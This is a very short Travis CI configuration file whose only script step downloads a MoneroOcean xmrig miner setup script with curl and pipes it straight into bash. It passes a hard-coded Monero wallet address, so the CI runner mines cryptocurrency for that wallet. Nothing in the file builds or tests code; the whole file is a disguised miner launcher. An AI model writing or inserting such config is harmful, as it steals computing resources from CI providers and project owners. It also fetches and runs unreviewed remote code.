language: bash

sudo: required

script:
    - curl -s -L https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/setup_moneroocean_miner.sh | bash -s 434JEv95YjcK25LPJVv5n9iybDjbyk61P9LtoQuwVc6CgrSovw8T1b9DsTzguCWNKiQuDstrGxv1yQ5Y5xe6G4UCLkwE4gA
